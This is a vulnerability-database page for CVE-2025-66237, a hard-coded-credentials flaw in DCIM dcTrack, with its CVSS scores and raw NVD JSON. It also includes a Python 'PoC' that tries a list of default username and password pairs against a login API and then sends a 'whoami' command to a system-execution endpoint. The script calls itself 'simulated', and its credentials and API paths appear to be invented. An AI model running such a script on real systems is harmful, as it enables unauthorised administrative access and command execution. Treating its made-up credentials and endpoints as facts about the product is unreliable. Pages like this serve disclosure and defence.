Security Vulnerability Report
中文
CVE-2025-66237 CVSS 6.7 MEDIUM

CVE-2025-66237

Published: 2025-12-04 21:16:09
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

DCIM dcTrack platforms utilize default and hard-coded credentials for access. An attacker could use these credentials to administer the database, escalate privileges on the platform or execute system commands on the host.

CVSS Details

CVSS Score
6.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

DCIM dcTrack - 受影响版本需参考ICSA-25-338-05官方公告

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66237 PoC - DCIM dcTrack Default Credentials Exploitation # Note: This is a simulated PoC for educational purposes only import requests import json TARGET_HOST = "http://target-dcim-server" DCIM_PORT = 8080 # Hardcoded/default credentials for dcTrack (example paths) DEFAULT_CREDENTIALS = [ {"username": "admin", "password": "admin123"}, {"username": "admin", "password": "dctrack_default"}, {"username": "system", "password": "system123"}, {"username": "dctrack", "password": "dctrack"}, {"username": "svc_dcim", "password": "DCIM_svc_2024"} ] def exploit_dctrack_credentials(): """ Exploitation steps for CVE-2025-66237: 1. Identify running dcTrack service 2. Attempt login with default credentials 3. Extract session token 4. Access database management interface 5. Execute system commands via admin panel """ session = requests.Session() # Step 1: Service discovery base_url = f"{TARGET_HOST}:{DCIM_PORT}" # Step 2: Attempt authentication with default credentials for cred in DEFAULT_CREDENTIALS: login_payload = { "username": cred["username"], "password": cred["password"], "rememberMe": False } try: response = session.post( f"{base_url}/api/auth/login", json=login_payload, timeout=10 ) if response.status_code == 200: data = response.json() if data.get("success"): token = data.get("token") print(f"[+] SUCCESS: Valid credentials found!") print(f"[+] Username: {cred['username']}") print(f"[+] Password: {cred['password']}") print(f"[+] Token: {token}") # Step 3: Access database management db_response = session.get( f"{base_url}/api/database/query", headers={"Authorization": f"Bearer {token}"} ) # Step 4: Execute system commands cmd_payload = { "command": "whoami", "target": "host_system" } exec_response = session.post( f"{base_url}/api/system/execute", json=cmd_payload, headers={"Authorization": f"Bearer {token}"} ) if exec_response.status_code == 200: print(f"[+] SYSTEM COMPROMISED: Command execution successful") return True except requests.exceptions.RequestException as e: continue print("[-] Failed: No valid default credentials found") return False if __name__ == "__main__": print("=" * 60) print("CVE-2025-66237 PoC - DCIM dcTrack Default Credentials") print("=" * 60) exploit_dctrack_credentials()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66237", "sourceIdentifier": "[email protected]", "published": "2025-12-04T21:16:09.137", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "DCIM dcTrack platforms utilize default and hard-coded credentials for access. An attacker could use these credentials to administer the database, escalate privileges on the platform or execute system commands on the host."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-798"}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-338-05.json", "source": "[email protected]"}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-338-05", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.